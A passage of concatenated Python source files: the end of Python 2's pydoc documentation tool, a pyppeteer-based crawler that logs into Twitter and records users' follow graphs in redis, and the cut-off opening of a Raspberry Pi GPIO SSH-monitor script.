        'TUPLES': 'SEQUENCES',
        'TUPLELITERALS': ('ref/exprlists', 'TUPLES LITERALS'),
        'LISTS': ('lib/typesseq-mutable', 'LISTLITERALS'),
        'LISTLITERALS': ('ref/lists', 'LISTS LITERALS'),
        'DICTIONARIES': ('lib/typesmapping', 'DICTIONARYLITERALS'),
        'DICTIONARYLITERALS': ('ref/dict', 'DICTIONARIES LITERALS'),
        'BACKQUOTES': ('ref/string-conversions', 'repr str STRINGS LITERALS'),
        'ATTRIBUTES': ('ref/attribute-references', 'getattr hasattr setattr ATTRIBUTEMETHODS'),
        'SUBSCRIPTS': ('ref/subscriptions', 'SEQUENCEMETHODS1'),
        'SLICINGS': ('ref/slicings', 'SEQUENCEMETHODS2'),
        'CALLS': ('ref/calls', 'EXPRESSIONS'),
        'POWER': ('ref/power', 'EXPRESSIONS'),
        'UNARY': ('ref/unary', 'EXPRESSIONS'),
        'BINARY': ('ref/binary', 'EXPRESSIONS'),
        'SHIFTING': ('ref/shifting', 'EXPRESSIONS'),
        'BITWISE': ('ref/bitwise', 'EXPRESSIONS'),
        'COMPARISON': ('ref/comparisons', 'EXPRESSIONS BASICMETHODS'),
        'BOOLEAN': ('ref/Booleans', 'EXPRESSIONS TRUTHVALUE'),
        'ASSERTION': 'assert',
        'ASSIGNMENT': ('ref/assignment', 'AUGMENTEDASSIGNMENT'),
        'AUGMENTEDASSIGNMENT': ('ref/augassign', 'NUMBERMETHODS'),
        'DELETION': 'del',
        'PRINTING': 'print',
        'RETURNING': 'return',
        'IMPORTING': 'import',
        'CONDITIONAL': 'if',
        'LOOPING': ('ref/compound', 'for while break continue'),
        'TRUTHVALUE': ('lib/truth', 'if while and or not BASICMETHODS'),
        'DEBUGGING': ('lib/module-pdb', 'pdb'),
        'CONTEXTMANAGERS': ('ref/context-managers', 'with'),
    }

    def __init__(self, input, output):
        self.input = input
        self.output = output
        self.docdir = None
        # Probe the usual installation locations for the HTML docs; the
        # first directory that contains a 'lib' subdirectory wins (the
        # loop keeps overwriting, so effectively the *last* match wins).
        execdir = os.path.dirname(sys.executable)
        homedir = os.environ.get('PYTHONHOME')
        for dir in [os.environ.get('PYTHONDOCS'),
                    homedir and os.path.join(homedir, 'doc'),
                    os.path.join(execdir, 'doc'),
                    '/usr/doc/python-docs-' + split(sys.version)[0],
                    '/usr/doc/python-' + split(sys.version)[0],
                    '/usr/doc/python-docs-' + sys.version[:3],
                    '/usr/doc/python-' + sys.version[:3],
                    os.path.join(sys.prefix, 'Resources/English.lproj/Documentation')]:
            if dir and os.path.isdir(os.path.join(dir, 'lib')):
                self.docdir = dir

    def __repr__(self):
        # Typing "help" alone at the interactive prompt triggers repr();
        # treat that as a request to start the interactive session.
        if inspect.stack()[1][3] == '?':
            self()
            return ''
        return '<pydoc.Helper instance>'

    def __call__(self, request=None):
        if request is not None:
            self.help(request)
        else:
            self.intro()
            self.interact()
            self.output.write('''
You are now leaving help and returning to the Python interpreter.
If you want to ask for help on a particular object directly from the
interpreter, you can type "help(object)". Executing "help('string')"
has the same effect as typing a particular string at the help> prompt.
''')

    def interact(self):
        """Read requests from the help> prompt until quit/EOF/interrupt."""
        self.output.write('\n')
        while True:
            try:
                request = self.getline('help> ')
                if not request: break
            except (KeyboardInterrupt, EOFError):
                break
            # Drop surrounding quotes so help> 'topic' works like help> topic.
            request = strip(replace(request, '"', '', "'", ''))
            if lower(request) in ('q', 'quit'): break
            self.help(request)

    def getline(self, prompt):
        """Read one line, using raw_input when available."""
        if self.input is sys.stdin:
            return raw_input(prompt)
        else:
            self.output.write(prompt)
            self.output.flush()
            return self.input.readline()

    def help(self, request):
        """Dispatch a single help request (string or object)."""
        if type(request) is type(''):
            if request == 'help': self.intro()
            elif request == 'keywords': self.listkeywords()
            elif request == 'topics': self.listtopics()
            elif request == 'modules': self.listmodules()
            elif request[:8] == 'modules ':
                self.listmodules(split(request)[1])
            elif request in self.keywords: self.showtopic(request)
            elif request in self.topics: self.showtopic(request)
            elif request: doc(request, 'Help on %s:')
        elif isinstance(request, Helper): self()
        else: doc(request, 'Help on %s:')
        self.output.write('\n')

    def intro(self):
        self.output.write('''
Welcome to Python %s! This is the online help utility.
If this is your first time using Python, you should definitely check out
the tutorial on the Internet at http://www.python.org/doc/tut/.
Enter the name of any module, keyword, or topic to get help on writing
Python programs and using Python modules. To quit this help utility and
return to the interpreter, just type "quit".
To get a list of available modules, keywords, or topics, type "modules",
"keywords", or "topics". Each module also comes with a one-line summary
of what it does; to list the modules whose summaries contain a given word
such as "spam", type "modules spam".
''' % sys.version[:3])

    def list(self, items, columns=4, width=80):
        """Print items sorted, flowing down `columns` columns."""
        items = items[:]
        items.sort()
        colw = width / columns
        rows = (len(items) + columns - 1) / columns
        for row in range(rows):
            for col in range(columns):
                i = col * rows + row
                if i < len(items):
                    self.output.write(items[i])
                    if col < columns - 1:
                        # Pad out to the column width.
                        self.output.write(' ' + ' ' * (colw-1 - len(items[i])))
            self.output.write('\n')

    def listkeywords(self):
        self.output.write('''
Here is a list of the Python keywords. Enter any keyword to get more help.
''')
        self.list(self.keywords.keys())

    def listtopics(self):
        self.output.write('''
Here is a list of available topics. Enter any topic name to get more help.
''')
        self.list(self.topics.keys())

    def showtopic(self, topic):
        """Render the installed HTML page for a topic/keyword as text."""
        if not self.docdir:
            self.output.write('''
Sorry, topic and keyword documentation is not available because the Python
HTML documentation files could not be found. If you have installed them,
please set the environment variable PYTHONDOCS to indicate their location.
On the Microsoft Windows operating system, the files can be built by
running "hh -decompile . PythonNN.chm" in the C:\PythonNN\Doc> directory.
''')
            return
        target = self.topics.get(topic, self.keywords.get(topic))
        if not target:
            self.output.write('no documentation found for %s\n' % repr(topic))
            return
        if type(target) is type(''):
            # Alias entry: follow it to the real topic.
            return self.showtopic(target)
        filename, xrefs = target
        filename = self.docdir + '/' + filename + '.html'
        try:
            file = open(filename)
        except:
            self.output.write('could not read docs from %s\n' % filename)
            return
        # Strip the navigation bars and the address footer, then render
        # the remaining HTML to plain text via htmllib.
        divpat = re.compile('<div[^>]*navigat.*?</div.*?>', re.I | re.S)
        addrpat = re.compile('<address.*?>.*?</address.*?>', re.I | re.S)
        document = re.sub(addrpat, '', re.sub(divpat, '', file.read()))
        file.close()
        import htmllib, formatter, StringIO
        buffer = StringIO.StringIO()
        parser = htmllib.HTMLParser(
            formatter.AbstractFormatter(formatter.DumbWriter(buffer)))
        parser.start_table = parser.do_p
        parser.end_table = lambda parser=parser: parser.do_p({})
        parser.start_tr = parser.do_br
        parser.start_td = parser.start_th = lambda a, b=buffer: b.write('\t')
        parser.feed(document)
        buffer = replace(buffer.getvalue(), '\xa0', ' ', '\n', '\n ')
        pager(' ' + strip(buffer) + '\n')
        if xrefs:
            buffer = StringIO.StringIO()
            formatter.DumbWriter(buffer).send_flowing_data(
                'Related help topics: ' + join(split(xrefs), ', ') + '\n')
            self.output.write('\n%s\n' % buffer.getvalue())

    def listmodules(self, key=''):
        """List all modules, or (with a key) modules matching the key."""
        if key:
            self.output.write('''
Here is a list of matching modules. Enter any module name to get more help.
''')
            apropos(key)
        else:
            self.output.write('''
Please wait a moment while I gather a list of all available modules...
''')
            modules = {}
            def callback(path, modname, desc, modules=modules):
                # Collapse packages to "name (package)" and keep only
                # top-level names.
                if modname and modname[-9:] == '.__init__':
                    modname = modname[:-9] + ' (package)'
                if find(modname, '.') < 0:
                    modules[modname] = 1
            ModuleScanner().run(callback)
            self.list(modules.keys())
            self.output.write('''
Enter any module name to get more help. Or, type "modules spam" to search
for modules whose descriptions contain the word "spam".
''')
# Module-level Helper bound to the real stdin/stdout; used by cli() below.
help = Helper(sys.stdin, sys.stdout)
class Scanner:
    """A generic tree iterator.

    Yields nodes via repeated next() calls: the children of each root (the
    roots themselves are never returned), descending into a child whenever
    descendp(child) is true, and returning None once exhausted.
    """

    def __init__(self, roots, children, descendp):
        # Copy so the caller's root list is never consumed.
        self.roots = roots[:]
        self.state = []          # stack of (node, remaining-children) pairs
        self.children = children
        self.descendp = descendp

    def next(self):
        """Return the next node in the traversal, or None when done."""
        while True:
            if not self.state:
                if not self.roots:
                    return None
                seed = self.roots.pop(0)
                self.state = [(seed, self.children(seed))]
            current, pending = self.state[-1]
            if not pending:
                # This subtree is exhausted; resume its parent.
                self.state.pop()
                continue
            nxt = pending.pop(0)
            if self.descendp(nxt):
                self.state.append((nxt, self.children(nxt)))
            return nxt
class ModuleScanner:
    """An interruptible scanner that searches module synopses."""

    def run(self, callback, key=None, completer=None):
        """Invoke callback(path, modname, desc) for each module.

        With key=None every module is reported; otherwise only modules
        whose "name - description" line contains the (lowercased) key.
        Setting self.quit aborts the sys.path scan between modules.
        """
        if key: key = lower(key)
        self.quit = False
        seen = {}
        # Built-in modules first.
        for modname in sys.builtin_module_names:
            if modname != '__main__':
                seen[modname] = 1
                if key is None:
                    callback(None, modname, '')
                else:
                    # First docstring line serves as the description.
                    desc = split(__import__(modname).__doc__ or '', '\n')[0]
                    if find(lower(modname + ' - ' + desc), key) >= 0:
                        callback(None, modname, desc)
        # Then everything reachable from sys.path.
        for importer, modname, ispkg in pkgutil.walk_packages():
            if self.quit:
                break
            if key is None:
                callback(None, modname, '')
            else:
                loader = importer.find_module(modname)
                if hasattr(loader,'get_source'):
                    import StringIO
                    # Read the synopsis from source without importing.
                    desc = source_synopsis(
                        StringIO.StringIO(loader.get_source(modname))
                    ) or ''
                    if hasattr(loader,'get_filename'):
                        path = loader.get_filename(modname)
                    else:
                        path = None
                else:
                    # No source available: import and use the docstring.
                    module = loader.load_module(modname)
                    desc = (module.__doc__ or '').splitlines()[0]
                    path = getattr(module,'__file__',None)
                if find(lower(modname + ' - ' + desc), key) >= 0:
                    callback(path, modname, desc)
        if completer:
            completer()
def apropos(key):
    """Print all the one-line module summaries that contain a substring."""
    def callback(path, modname, desc):
        if modname[-9:] == '.__init__':
            modname = modname[:-9] + ' (package)'
        print modname, desc and '- ' + desc
    # Imports attempted during the scan can emit warnings; silence them.
    try: import warnings
    except ImportError: pass
    else: warnings.filterwarnings('ignore') # ignore problems during import
    ModuleScanner().run(callback, key)
# --------------------------------------------------- web browser interface
def serve(port, callback=None, completer=None):
    """Run an HTTP server serving pydoc HTML pages on the given port.

    `callback` is invoked with the server once it is ready;
    `completer` is invoked when the server shuts down.
    """
    import BaseHTTPServer, mimetools, select

    # Patch up mimetools.Message so it doesn't break if rfc822 is reloaded.
    class Message(mimetools.Message):
        def __init__(self, fp, seekable=1):
            Message = self.__class__
            Message.__bases__[0].__bases__[0].__init__(self, fp, seekable)
            self.encodingheader = self.getheader('content-transfer-encoding')
            self.typeheader = self.getheader('content-type')
            self.parsetype()
            self.parseplist()

    class DocHandler(BaseHTTPServer.BaseHTTPRequestHandler):
        def send_document(self, title, contents):
            """Send one complete HTML page; ignore client disconnects."""
            try:
                self.send_response(200)
                self.send_header('Content-Type', 'text/html')
                self.end_headers()
                self.wfile.write(html.page(title, contents))
            except IOError: pass

        def do_GET(self):
            # '/name.html' -> document for 'name'; '/' -> module index.
            path = self.path
            if path[-5:] == '.html': path = path[:-5]
            if path[:1] == '/': path = path[1:]
            if path and path != '.':
                try:
                    obj = locate(path, forceload=1)
                except ErrorDuringImport, value:
                    self.send_document(path, html.escape(str(value)))
                    return
                if obj:
                    self.send_document(describe(obj), html.document(obj, path))
                else:
                    self.send_document(path,
                        'no Python documentation found for %s' % repr(path))
            else:
                heading = html.heading(
                    '<big><big><strong>Python: Index of Modules</strong></big></big>',
                    '#ffffff', '#7799ee')
                def bltinlink(name):
                    return '<a href="%s.html">%s</a>' % (name, name)
                names = filter(lambda x: x != '__main__',
                               sys.builtin_module_names)
                contents = html.multicolumn(names, bltinlink)
                indices = ['<p>' + html.bigsection(
                    'Built-in Modules', '#ffffff', '#ee77aa', contents)]
                seen = {}
                for dir in sys.path:
                    indices.append(html.index(dir, seen))
                contents = heading + join(indices) + '''<p align=right>
<font color="#909090" face="helvetica, arial"><strong>
pydoc</strong> by Ka-Ping Yee <ping@lfw.org></font>'''
                self.send_document('Index of Modules', contents)

        def log_message(self, *args): pass  # silence per-request logging

    class DocServer(BaseHTTPServer.HTTPServer):
        def __init__(self, port, callback):
            host = (sys.platform == 'mac') and '127.0.0.1' or 'localhost'
            self.address = ('', port)
            self.url = 'http://%s:%d/' % (host, port)
            self.callback = callback
            self.base.__init__(self, self.address, self.handler)

        def serve_until_quit(self):
            # Poll with a 1s timeout so self.quit is honoured promptly.
            import select
            self.quit = False
            while not self.quit:
                rd, wr, ex = select.select([self.socket.fileno()], [], [], 1)
                if rd: self.handle_request()

        def server_activate(self):
            self.base.server_activate(self)
            if self.callback: self.callback(self)

    DocServer.base = BaseHTTPServer.HTTPServer
    DocServer.handler = DocHandler
    DocHandler.MessageClass = Message
    try:
        try:
            DocServer(port, callback).serve_until_quit()
        except (KeyboardInterrupt, select.error):
            pass
    finally:
        if completer: completer()
# ----------------------------------------------------- graphical interface
def gui():
    """Graphical interface (starts web server and pops up a control window)."""
    class GUI:
        def __init__(self, window, port=7464):
            self.window = window
            self.server = None
            self.scanner = None
            import Tkinter
            # Top row: server status plus open/quit buttons.
            self.server_frm = Tkinter.Frame(window)
            self.title_lbl = Tkinter.Label(self.server_frm,
                text='Starting server...\n ')
            self.open_btn = Tkinter.Button(self.server_frm,
                text='open browser', command=self.open, state='disabled')
            self.quit_btn = Tkinter.Button(self.server_frm,
                text='quit serving', command=self.quit, state='disabled')
            # Second row: search entry and stop button.
            self.search_frm = Tkinter.Frame(window)
            self.search_lbl = Tkinter.Label(self.search_frm, text='Search for')
            self.search_ent = Tkinter.Entry(self.search_frm)
            self.search_ent.bind('<Return>', self.search)
            self.stop_btn = Tkinter.Button(self.search_frm,
                text='stop', pady=0, command=self.stop, state='disabled')
            if sys.platform == 'win32':
                # Trying to hide and show this button crashes under Windows.
                self.stop_btn.pack(side='right')
            self.window.title('pydoc')
            self.window.protocol('WM_DELETE_WINDOW', self.quit)
            self.title_lbl.pack(side='top', fill='x')
            self.open_btn.pack(side='left', fill='x', expand=1)
            self.quit_btn.pack(side='right', fill='x', expand=1)
            self.server_frm.pack(side='top', fill='x')
            self.search_lbl.pack(side='left')
            self.search_ent.pack(side='right', fill='x', expand=1)
            self.search_frm.pack(side='top', fill='x')
            self.search_ent.focus_set()
            # Results listbox (hidden until a search expands the window).
            font = ('helvetica', sys.platform == 'win32' and 8 or 10)
            self.result_lst = Tkinter.Listbox(window, font=font, height=6)
            self.result_lst.bind('<Button-1>', self.select)
            self.result_lst.bind('<Double-Button-1>', self.goto)
            self.result_scr = Tkinter.Scrollbar(window,
                orient='vertical', command=self.result_lst.yview)
            self.result_lst.config(yscrollcommand=self.result_scr.set)
            self.result_frm = Tkinter.Frame(window)
            self.goto_btn = Tkinter.Button(self.result_frm,
                text='go to selected', command=self.goto)
            self.hide_btn = Tkinter.Button(self.result_frm,
                text='hide results', command=self.hide)
            self.goto_btn.pack(side='left', fill='x', expand=1)
            self.hide_btn.pack(side='right', fill='x', expand=1)
            # Remember collapsed/expanded geometries.
            self.window.update()
            self.minwidth = self.window.winfo_width()
            self.minheight = self.window.winfo_height()
            self.bigminheight = (self.server_frm.winfo_reqheight() +
                                 self.search_frm.winfo_reqheight() +
                                 self.result_lst.winfo_reqheight() +
                                 self.result_frm.winfo_reqheight())
            self.bigwidth, self.bigheight = self.minwidth, self.bigminheight
            self.expanded = 0
            self.window.wm_geometry('%dx%d' % (self.minwidth, self.minheight))
            self.window.wm_minsize(self.minwidth, self.minheight)
            self.window.tk.willdispatch()
            # The HTTP server runs in a background thread.
            import threading
            threading.Thread(
                target=serve, args=(port, self.ready, self.quit)).start()

        def ready(self, server):
            # Called by serve() once the server is listening.
            self.server = server
            self.title_lbl.config(
                text='Python documentation server at\n' + server.url)
            self.open_btn.config(state='normal')
            self.quit_btn.config(state='normal')

        def open(self, event=None, url=None):
            url = url or self.server.url
            try:
                import webbrowser
                webbrowser.open(url)
            except ImportError: # pre-webbrowser.py compatibility
                if sys.platform == 'win32':
                    os.system('start "%s"' % url)
                elif sys.platform == 'mac':
                    try: import ic
                    except ImportError: pass
                    else: ic.launchurl(url)
                else:
                    rc = os.system('netscape -remote "openURL(%s)" &' % url)
                    if rc: os.system('netscape "%s" &' % url)

        def quit(self, event=None):
            if self.server:
                self.server.quit = 1
            self.window.quit()

        def search(self, event=None):
            key = self.search_ent.get()
            self.stop_btn.pack(side='right')
            self.stop_btn.config(state='normal')
            self.search_lbl.config(text='Searching for "%s"...' % key)
            self.search_ent.forget()
            self.search_lbl.pack(side='left')
            self.result_lst.delete(0, 'end')
            self.goto_btn.config(state='disabled')
            self.expand()
            # Scan modules in a background thread; stop any previous scan.
            import threading
            if self.scanner:
                self.scanner.quit = 1
            self.scanner = ModuleScanner()
            threading.Thread(target=self.scanner.run,
                             args=(self.update, key, self.done)).start()

        def update(self, path, modname, desc):
            # Per-match callback from the scanner thread.
            if modname[-9:] == '.__init__':
                modname = modname[:-9] + ' (package)'
            self.result_lst.insert('end',
                modname + ' - ' + (desc or '(no description)'))

        def stop(self, event=None):
            if self.scanner:
                self.scanner.quit = 1
            self.scanner = None

        def done(self):
            # Scan finished: restore the search widgets.
            self.scanner = None
            self.search_lbl.config(text='Search for')
            self.search_lbl.pack(side='left')
            self.search_ent.pack(side='right', fill='x', expand=1)
            if sys.platform != 'win32': self.stop_btn.forget()
            self.stop_btn.config(state='disabled')

        def select(self, event=None):
            self.goto_btn.config(state='normal')

        def goto(self, event=None):
            selection = self.result_lst.curselection()
            if selection:
                modname = split(self.result_lst.get(selection[0]))[0]
                self.open(url=self.server.url + modname + '.html')

        def collapse(self):
            if not self.expanded: return
            self.result_frm.forget()
            self.result_scr.forget()
            self.result_lst.forget()
            self.bigwidth = self.window.winfo_width()
            self.bigheight = self.window.winfo_height()
            self.window.wm_geometry('%dx%d' % (self.minwidth, self.minheight))
            self.window.wm_minsize(self.minwidth, self.minheight)
            self.expanded = 0

        def expand(self):
            if self.expanded: return
            self.result_frm.pack(side='bottom', fill='x')
            self.result_scr.pack(side='right', fill='y')
            self.result_lst.pack(side='top', fill='both', expand=1)
            self.window.wm_geometry('%dx%d' % (self.bigwidth, self.bigheight))
            self.window.wm_minsize(self.minwidth, self.bigminheight)
            self.expanded = 1

        def hide(self, event=None):
            self.stop()
            self.collapse()

    import Tkinter
    try:
        root = Tkinter.Tk()
        # Tk will crash if pythonw.exe has an XP .manifest
        # file and the root has is not destroyed explicitly.
        # If the problem is ever fixed in Tk, the explicit
        # destroy can go.
        try:
            gui = GUI(root)
            root.mainloop()
        finally:
            root.destroy()
    except KeyboardInterrupt:
        pass
# -------------------------------------------------- command-line interface
def ispath(x):
    """Return true when x is a string containing a path separator."""
    return isinstance(x, str) and os.sep in x
def cli():
    """Command-line interface (looks at sys.argv to decide what to do)."""
    import getopt
    class BadUsage: pass  # raised internally to trigger the usage message

    # Scripts don't get the current directory in their path by default.
    scriptdir = os.path.dirname(sys.argv[0])
    if scriptdir in sys.path:
        sys.path.remove(scriptdir)
    sys.path.insert(0, '.')

    try:
        opts, args = getopt.getopt(sys.argv[1:], 'gk:p:w')
        writing = 0
        for opt, val in opts:
            if opt == '-g':
                gui()
                return
            if opt == '-k':
                apropos(val)
                return
            if opt == '-p':
                try:
                    port = int(val)
                except ValueError:
                    raise BadUsage
                def ready(server):
                    print 'pydoc server ready at %s' % server.url
                def stopped():
                    print 'pydoc server stopped'
                serve(port, ready, stopped)
                return
            if opt == '-w':
                writing = 1

        if not args: raise BadUsage
        for arg in args:
            if ispath(arg) and not os.path.exists(arg):
                print 'file %r does not exist' % arg
                break
            try:
                # A real file path is imported as a module first.
                if ispath(arg) and os.path.isfile(arg):
                    arg = importfile(arg)
                if writing:
                    if ispath(arg) and os.path.isdir(arg):
                        writedocs(arg)
                    else:
                        writedoc(arg)
                else:
                    help.help(arg)
            except ErrorDuringImport, value:
                print value

    except (getopt.error, BadUsage):
        cmd = os.path.basename(sys.argv[0])
        print """pydoc - the Python documentation tool
%s <name> ...
Show text documentation on something. <name> may be the name of a
Python keyword, topic, function, module, or package, or a dotted
reference to a class or function within a module or module in a
package. If <name> contains a '%s', it is used as the path to a
Python source file to document. If name is 'keywords', 'topics',
or 'modules', a listing of these things is displayed.
%s -k <keyword>
Search for a keyword in the synopsis lines of all available modules.
%s -p <port>
Start an HTTP server on the given port on the local machine.
%s -g
Pop up a graphical interface for finding and serving documentation.
%s -w <name> ...
Write out the HTML documentation for a module to a file in the current
directory. If <name> contains a '%s', it is treated as a filename; if
it names a directory, documentation is written for all the contents.
""" % (cmd, os.sep, cmd, cmd, cmd, cmd, os.sep)
# Run the command-line interface when invoked as a script.
if __name__ == '__main__': cli()
|
twitographer.py | # twitographer.py -- a parallelized web crawler to traverse the twitter graph
# matthew jack <{username}@uiowa.edu>
import os
import sys
import time
import json
import redis
import signal
import asyncio
import logging
import credentials
import multiprocessing as mp
from pyppeteer import launch
class Logger:
    """Thin wrapper around the stdlib logging module.

    Configures the root logger with a format that embeds this worker's
    PID (wrapped in ANSI red escapes) so interleaved output from the
    multiprocessing workers can be told apart.
    """

    def __init__(self):
        logging.basicConfig(
            format='%(asctime)s \033[31;1m' + str(os.getpid()) + '\033[0m: %(message)s',
            level=logging.INFO,
            datefmt='%H:%M:%S')
        # BUG FIX: basicConfig() returns None, so the original
        # `self.logger = logging.basicConfig(...)` stored None.
        self.logger = logging.getLogger(__name__)

    def log(self, msg, level='info'):
        """Log msg at 'info' or 'warn'; unknown levels fall back to info
        instead of being silently dropped (as the original did)."""
        if level == 'warn':
            logging.warning(msg)
        else:
            logging.info(msg)
class Crawler:
    """Drives a pyppeteer (headless Chromium) session against twitter.com."""

    async def login(self, creds):
        """Open a browser, log in with creds['username']/creds['password'],
        and keep the logged-in page on self.page for later crawls."""
        username_selector = ".js-username-field"
        password_selector = ".js-password-field"
        login_selector = "button.submit"
        url = "https://twitter.com/login"
        browser = await launch({"headless": False})
        self.page = await browser.newPage()
        await self.page.goto(url)
        await self.page.waitForSelector(username_selector)
        await self.page.click(username_selector)
        await self.page.keyboard.type(creds['username'])
        await self.page.click(password_selector)
        await self.page.keyboard.type(creds['password'])
        await self.page.click(login_selector)
        # The notifications icon only renders once login has succeeded.
        await self.page.waitForSelector('.Icon--notifications')

    async def crawl(self, user):
        """Scroll through twitter.com/<user>/following and collect names.

        Returns the extracted follows, or False when the page cannot be
        loaded or is_page_valid() rejects it.
        """
        scroll_delay = 500
        # await self.page.waitFor(scroll_delay)
        try:
            await self.page.goto('https://twitter.com/'+user+'/following')
        except:
            # NOTE(review): bare except — any navigation error skips the user.
            return False
        try:
            await self.page.waitForSelector('div.GridTimeline-items > div.Grid--withGutter')
        except:
            return False
        # await self.page.waitFor(200)
        valid = await self.is_page_valid()
        if valid == False:
            return False
        follows = {}
        scrolls = 0
        # Keep scrolling until the document height stops growing, i.e. the
        # infinite-scroll list has been exhausted.
        while True and self.page:
            if scrolls == 0:
                previous_height = 0
            else:
                previous_height = await self.page.evaluate('document.body.scrollHeight')
            follows = await self.extract_items(user)
            await self.page.evaluate('window.scrollTo(0, document.body.scrollHeight)')
            await self.page.waitFor(scroll_delay)
            new_height = await self.page.evaluate('document.body.scrollHeight')
            scrolls += 1
            if previous_height == new_height:
                break
        return follows

    async def is_page_valid(self):
        """Heuristics for pages we refuse to crawl (returns bool)."""
        # check for too many followers
        follower_count = await self.page.querySelector('a[data-nav="following"] > span.ProfileNav-value')
        follower_count = await self.page.evaluate('(element) => element.getAttribute("data-count")', follower_count)
        if int(follower_count) > 1000:
            return False
        # account locked?
        protected = await self.page.querySelector('div.ProtectedTimeline')
        if protected:
            return False
        # no follows?
        empty = await self.page.querySelector('div.GridTimeline-emptyText')
        empty = await self.page.evaluate('(element) => element.getAttribute("display")', empty)
        if empty == 'none':
            return False
        return True

    async def extract_items(self, user):
        """Return the screen names of all ProfileCards currently rendered,
        excluding the crawled user themself."""
        follows = []
        extracted_elements = await self.page.querySelectorAll('div.ProfileCard')
        for element in extracted_elements:
            try:
                follow_screen_name = await self.page.evaluate('(element) => element.getAttribute("data-screen-name")', element)
            except:
                # NOTE(review): returns '' (not a list) on failure; the
                # caller treats it as the follows value — confirm intended.
                print("error in extract_items, skipping to next page")
                return ''
            if follow_screen_name == user:
                continue
            # follow_user_id is fetched but never used beyond this scope.
            follow_user_id = await self.page.evaluate('(element) => element.getAttribute("data-user-id")', element)
            follows.append(follow_screen_name)
        return follows
class Recorder:
    """Persists crawl state in redis: per-user edge sets, the work queue,
    and bookkeeping sets (parsed/skipped/in-progress)."""

    def __init__(self):
        self.r = redis.StrictRedis(host='localhost', port=6379, db=0)

    def save_graph(self, user, follows):
        """Record user's outgoing edges and mark the user as parsed."""
        # One redis set per user ('graph:<user>') holds the edges.
        for x in follows:
            self.r.sadd('graph:'+user, x)
        self.r.sadd('parsed_users', user)

    def add_to_queue(self, list):
        # NOTE(review): parameter name shadows the builtin `list`; renaming
        # would change the keyword interface, so it is only flagged here.
        if(len(list) > 0):
            self.r.sadd('queue', *list)

    def save_duplicates(self, list):
        if(len(list) > 0):
            self.r.rpush('duplicates', *list)

    def skip_user(self, user):
        self.r.rpush('skipped', user)

    def set_in_progress(self, user):
        self.r.sadd('in_progress', user)

    def resolve_in_progress(self, user):
        self.r.srem('in_progress', user)

    def resume_in_progress(self):
        # NOTE(review): pops one member but discards the result — resumption
        # appears to be handled by initialize_queue() instead.
        self.r.spop('in_progress')
class Cartographer:
    """Coordinates recording and progress reporting for each crawled user."""

    def __init__(self):
        # Flush redis to disk on Ctrl-C before exiting.
        signal.signal(signal.SIGINT, self.catch_interrupt)
        self.recorder = Recorder()
        self.logger = Logger()

    def process_follows(self, user, follows):
        """Record user's follow edges and enqueue the follows for crawling."""
        duplicates = []
        self.recorder.save_graph(user, follows)
        duplicates = self.deduplicate_follows(user, follows)
        # NOTE(review): the full follows list is enqueued, including the
        # already-parsed accounts counted in `duplicates`, so the log line
        # below overstates how many *new* accounts were added. The queue is
        # a redis set, so re-adding is at least idempotent — confirm whether
        # duplicates were meant to be filtered out here.
        self.recorder.add_to_queue(follows)
        self.recorder.save_duplicates(duplicates)
        print('=================================================================================================================')
        self.logger.log('@'+user+' follows '+str(len(follows))+' accounts; found '+str(len(duplicates))+' duplicates; adding '+str(len(follows) - len(duplicates))+' accounts to queue.')
        self.logger.log('The queue has '+str(self.recorder.r.scard('queue'))+' accounts; we\'ve explored '+str(self.recorder.r.scard('parsed_users'))+' nodes so far.')
        print('=================================================================================================================')

    def deduplicate_follows(self, user, follows):
        """Return the members of graph:<user> that were already parsed."""
        duplicates = self.recorder.r.sinter('graph:'+user, 'parsed_users')
        return duplicates

    def catch_interrupt(self, sig_num, stack_frame):
        """SIGINT handler: persist redis state, then exit cleanly."""
        self.logger.log('Caught exit signal')
        self.logger.log('Flushing data to db...')
        self.recorder.r.save()
        self.logger.log('Exiting')
        sys.exit(0)
        return  # unreachable: sys.exit() raises SystemExit above
async def Conductor(creds):
    """Main loop for one worker: log in, then drain the shared redis queue."""
    crawler = Crawler()
    await crawler.login(creds)
    cartographer = Cartographer()
    while True:
        if cartographer.recorder.r.scard('queue') <= 0:
            # Queue looks empty; wait a minute in case another worker is
            # mid-crawl, then re-check before declaring the graph done.
            time.sleep(60)
            if cartographer.recorder.r.scard('queue') <= 0:
                cartographer.logger.log('Graph traversed')
                cartographer.recorder.r.save()
                return
        user = cartographer.recorder.r.spop('queue')
        user = user.decode("utf-8") # spop returns bytes b'key
        cartographer.recorder.set_in_progress(user)
        cartographer.logger.log('Crawling @'+user+'...')
        follows = await crawler.crawl(user)
        if follows == False:
            cartographer.logger.log('====== Skipping @'+user+'; either the user follows too many accounts or we can\'t see the page ======')
            cartographer.recorder.skip_user(user)
        else:
            cartographer.process_follows(user, follows)
        cartographer.recorder.resolve_in_progress(user)
def initialize_queue():
    """Seed the Redis crawl queue.

    Users left in 'in_progress' by a previous run are moved back onto the
    queue; if nothing was resumed and the queue is empty, the entry point
    (argv[1], defaulting to 'dril') is used as the crawl seed.
    """
    entry_point = str(sys.argv[1]) if len(sys.argv) >= 2 else 'dril'
    r = redis.StrictRedis(host='localhost', port=6379, db=0)
    # Drain 'in_progress' back onto the queue (the original duplicated the
    # first spop/sadd pair before the loop; a single loop is equivalent).
    resumed = False
    while True:
        resume = r.spop('in_progress')
        if not resume:
            break
        r.sadd('queue', resume)
        resumed = True
    # Only seed the entry point when nothing was resumed and the queue is
    # empty, matching the original if/elif behaviour.
    if not resumed and r.scard('queue') == 0:
        r.sadd('queue', entry_point)
def Manager(creds):
    """Worker-process entry point: run Conductor(creds) on a fresh event loop."""
    event_loop = asyncio.new_event_loop()
    asyncio.set_event_loop(event_loop)
    event_loop.run_until_complete(Conductor(creds))
if __name__ == "__main__":
    initialize_queue()
    cred_list = credentials.creds
    # One worker process per credential set, capped at the CPU count.
    # BUGFIX: the original assigned `mp.cpu_count` (the function object,
    # missing the call parentheses), which made `size` non-integer and
    # crashed the range() below whenever creds outnumbered CPUs.
    size = min(len(cred_list), mp.cpu_count())
    print('Spawning '+str(size)+' processes...')
    jobs = []
    for _ in range(size):
        cred = cred_list.pop()
        job = mp.Process(target=Manager, args=(cred,))
        jobs.append(job)
    for j in jobs:
        j.start()
    for j in jobs:
        j.join()
|
ssh-monitor.py | from multiprocessing import Process
import RPi.GPIO as GPIO
import time
import subprocess
import psutil
GPIO.setmode(GPIO.BCM)  # use Broadcom (BCM) pin numbering
ledPin = 17     # LED lit while a loopback SSH session is active
buttonPin = 18  # momentary kill-switch button; pull-up enabled, pressed reads LOW
GPIO.setup(buttonPin, GPIO.IN, pull_up_down=GPIO.PUD_UP)
